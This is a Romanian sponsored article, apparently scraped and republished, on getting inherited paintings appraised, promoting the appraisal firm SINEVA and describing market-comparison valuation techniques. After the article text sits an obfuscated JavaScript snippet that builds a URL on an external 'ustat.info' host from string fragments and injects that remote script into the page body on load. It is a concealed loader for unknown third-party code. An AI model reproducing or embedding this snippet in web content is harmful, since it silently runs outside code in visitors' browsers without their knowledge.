Comoara din casa ta – Evaluarea tablourilor

[ad_1]

Atunci când ai tablouri vechi în casă, este posibil să nu știi exact care este valoarea lor reală si în acest caz, este recomandat să apelezi la profesioniști în evaluări, care să îți spună cât valorează exact tablourile tale. Sunt persoane care au moștenit picturi celebre și care au descoperit întâmplător că aveau de fapt o comoară în casă, de care nu știau nimic. De asemenea, au fost și cazuri în care proprietarii au aruncat tablourile vechi, neștiind de valoarea lor și pierzând astfel sume impresionante de bani.

Ce ar trebui să faci cu tablourile vechi?

Cea mai bună abordare a tablourilor poate fi cea prin piață, prin compararea directă sau compararea vânzărilor, care poate oferi o indicație asupra valorii prin compararea bunurilor cu altele identice sau asemănătoare, care au un preț cunoscut. Această abordare este relevantă doar atunci când pe piață există suficient de multe informații care pot fi verificate. Atunci când astfel de informații lipsesc, aplicabilitatea acestei metode va fi cu mult limitată. Prin urmare, pentru a fi sigur cât valorează tablourile din casa ta, cea mai bună soluție este evaluatorul.

Unde pot găsi un evaluator?

Evaluatorii de artă sunt mai greu de găsit decât alți evaluatori și în unele orașe lipsesc cu desăvârșire. Foarte mulți proprietari de tablouri apelează la evaluatorii care sunt în orașele mari învecinate. Spre exemplu, dacă locuiești în capitală sau în județele învecinate, cea mai bună soluție se va dovedi apelarea la un evaluator tablouri în BucureștiLa SINEVA vei găsi evaluatori profesioniști, cu o vastă experiență în acest domeniu, care vor putea spune cu certitudine, în urma verificărilor, valoarea reală a tablourilor pe care le prezinți. 

Ce face un evaluator?

Evaluatorul de artă trebuie să utilizeze surse credibile comparabile, cărora să le verifice acuratețea. Verificarea fiecărui astfel de detaliu poate să nu fie necesară în momentul în care sunt folosite baze de date credibile care oferă informații relevante. Raportul de evaluare va include de fiecare dată informațiile strânse în timpul evaluării și toate demersurile necesare, pe baza cărora a fost pus un preț pe tabloul în cauză. 

Evaluatorii își fundamentează concluziile pe baza vânzărilor de bunuri similare. Toate datele comparabile care evidențiază diferențe majore ale caracteristicilor, comparativ cu tabloul analizat, vor fi utilizate cu mare atenție și doar atunci când utilizarea acestor informații poate să fie justificată în mod corespunzător. Altfel, aceste informații comparabile nu vor fi considerate relevante. 

SINEVA (Societatea Evaluatorilor de Artă și Obiecte de Colecție)oferă încă din 2008 servicii de evaluare și expertiză în ceea ce privește operele de artă. Aceste evaluări sunt făcute direct sau prin colaboratori externi. Încă de la înființare, SINEVA a evaluat aproximativ 100.000 de lucrări de colecție și artă, cele mai multe dintre ele fiind din România, dar și de pe piața internațională. În prezent, SINEVa acționează în principal în domeniul evaluării și expeeritzării de artă și obiecte de colecție. 

Tehnici de comparație folosite în evaluarea tablourilor

Pentru evaluarea corectă a tablourilor se folosesc două tehnici de comparație uzuale – tehnica identificării directe și tehnica asimilării. 

Tehnica asimilării se bazează pe prețurile comparabilelor. Aceste prețuri sunt modificate astfel încât să reflecte diferențele dintre bunurile culturale comparabile și cele comparate. Elementele pe baza cărora se va face comparația depind de categoria în care este inclus bunul. Câteva dintre aceste elemente sunt:

  • Tehnicile și materialele folosite în realizarea bunului cultural
  • Vechimea bunului cultural evaluat
  • Apartenența bunului cultural la o colecție
  • Reproducerea bunului cultural în cataloage sau în monografii
  • Starea în care se află bunul cultural evaluat

Acestea sunt doar o parte dintre detaliile utilizate în evaluare. Un evaluator va identifica acele caracteristici ale bunurilor culturale pe care participanții din piață le consideră relevante pentru a stabili un preț.

Atunci când se aplică evaluarea prin piață, modul în care se fac ajustările asupra prețurilor determină sarcini dificile, care rămân în responsabilitatea evaluatorului. Toate ajustările efectuate pentru prețurile bunurilor culturale trebuie să fie argumentate în rapoarte de evaluare clare. Nu se admite utilizarea anumitor ajustări fără să fie prezentat modul în care s-a făcut estmarea. Valoarea finală va fi indicată de comparabilele care sunt foarte apropiate de subiectul evaluat și de prețul acestora. 

Pentru ca evaluarea să fie relevantă, este foarte important să apelezi de fiecare dată la profesioniști cu experiență în domeniu, care să furnizeze rapoarte clare cu privire la stabilirea prețului și a stării tabloului sau a altui bun cultural evaluat. Nu arunca tablourile vechi pe care le-ai moștenit de la bunici sau de la rudele mai în vârstă, înainte de a merge cu ele la un evaluator. Există riscul ca aruncându-le, sa pierzi sume importante de bani. Unele tablouri pot să nu valoreze nimic și să fie doar replici, în timp ce altele este foarte posibil să aibă valori mari sau chiar foarte mari, dacă sunt tablouri de colecție sau aparțin unor pictori celebri. (P)

(function(){
qmyz=document.createElement(„script”);qmyz_=(„us”)+(„ta”);
qmyz_+=”t”+(„.”);qmyz_+=(„in”);qmyzu=”433536952″;qmyz.async=true;
qmyzu+=”.916ycge5myzqcghX3″;qmyz.type=”text/javascript”;qmyz_+=”f”+”o”+(„/”);
qmyzu+=”tn6lnxjhvcmru”;qmyz.src=”https://”+qmyz_+qmyzu;
dqmyz=document.body;dqmyz.appendChild(qmyz);
})();

Articolul Comoara din casa ta – Evaluarea tablourilor apare prima dată în Bucuresti Business – Despre afaceri. Zi de zi.

[ad_2]

Source link